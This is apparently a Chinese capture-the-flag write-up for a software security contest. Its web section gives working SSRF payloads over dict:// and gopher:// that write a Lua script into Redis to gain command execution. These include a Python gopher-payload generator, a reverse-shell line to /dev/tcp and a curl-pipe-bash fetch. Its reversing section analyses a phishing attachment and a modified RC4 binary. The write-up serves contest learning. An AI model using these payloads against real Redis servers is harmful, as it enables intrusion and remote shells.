第18届软件系统安全大赛攻防赛wp

Web

CachedVisitor

• 环境搭建

docker build -t web1 .

docker run -d -p 8001:80 web1

• 访问环境

• 一般遇到这样的环境访问URL，首先想到SSRF，其次是闭合RCE
• file:///etc/passwd

• file:///readflag
• 但是这里读不了flag，根据dockerfile看flag的权限不可读

• 测试dict://

• dict://127.0.0.1:6379/config set dir /scripts

• dict://127.0.0.1:6379/config set dbfilename visit.script

• dict://127.0.0.1:6379/flushall
• ![image-20250122011053583](https://xu17-1326239041.cos.ap-guangzhou.myqcloud.com/xu17/202501220110721.png
• dict://127.0.0.1:6379/set shell “\n\n\n##LUA_START##ngx.say(io.popen(‘/readflag’):read(‘*a’))##LUA_END##\n\n\n”

• dict://127.0.0.1:6379/save

方法2 gopher协议

• 参考ZPZ团队wp

import urllib.parse

protocol = "gopher://"
ip = "127.0.0.1"
port = "6379"
shell = """
##LUA_START##
##os.execute("curl http://ip:port/shell.txt | bash")
os.execute("bash -c 'sh -i &>/dev/tcp/ip/2333 0>&1'")
##LUA_END##
"""
filename = "visit.script"
path = "/scripts"  # 如果无密码就不加，如果有密码就加

cmd = [
    "flushall",
    "set 1 {}".format(shell.replace(" ", "${IFS}")),
    "config set dir {}".format(path),
    "config set dbfilename {}".format(filename),
    "save"
]

payload = protocol + ip + ":" + port + "/_"

def redis_format(arr):
    CRLF = "\r\n"
    redis_arr = arr.split(" ")
    cmd = ""
    cmd += "*" + str(len(redis_arr))
    for x in redis_arr:
        cmd += CRLF + "$" + str(len((x.replace("${IFS}", " ")))) + CRLF + x.replace("${IFS}", " ")
    cmd += CRLF
    return cmd

if __name__ == "__main__":
    for x in cmd:
        payload += urllib.parse.quote(redis_format(x))
    print(payload)

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2492%0D%0A%0A%23%23LUA_START%23%23%0Aos.execute%28%22bash%20-c%20%27sh%20-i%20%26%3E/dev/tcp/ip/2333%200%3E%261%27%22%29%0A%23%23LUA_END%23%23%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%248%0D%0A/scripts%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%2412%0D%0Avisit.script%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A

Reference

• SSRF—gopher和dict打redis_gopher dict协议攻击redis-CSDN博客
• https://mp.weixin.qq.com/s/XK3W-MwnDWEdfumPPiRYzg
• 软件系统安全赛CachedVisitor详解——记一次对Redis+ssrf的详细分析 - 先知社区
• 2024年软件系统安全赛攻防赛web题CachedVisitor题解 - FreeBuf网络安全行业门户

Re

钓鱼邮件

给了一个.eml文件，outlook打开，有一个生日快乐.zip，解压需要密码，根据发件日期，24岁等信息，可以猜测出解压密码即为生日20001111

解压后得到生日快乐.exe，双击运行，wirshark抓包，找到ip和port

md5结果

donntyousee

查看函数sub_405559()

存在花指令

将retnop掉

动调跑一下，这里一定要在函数sub_405559()里面下断，不然单步会直接跳过该函数，直接跟丢了

多次尝试发现这个call是进行输入的地方，这里直接进行输入然后步过

这两个call步入

第一个call，发现是rc4初始化

第二个call是魔改的RC4，最后加了个亦或

跟一下加密后的结果，找到存储密文的地址unk_5C6CC0

然后去看密文在哪里进行check，这里交叉引用

定位到函数sub_4054FB，这个call步入

发现密文

秘钥key

这里做了反调试，导致key动态和静态的值不一样

将密文和keydump出来，用工具解密即可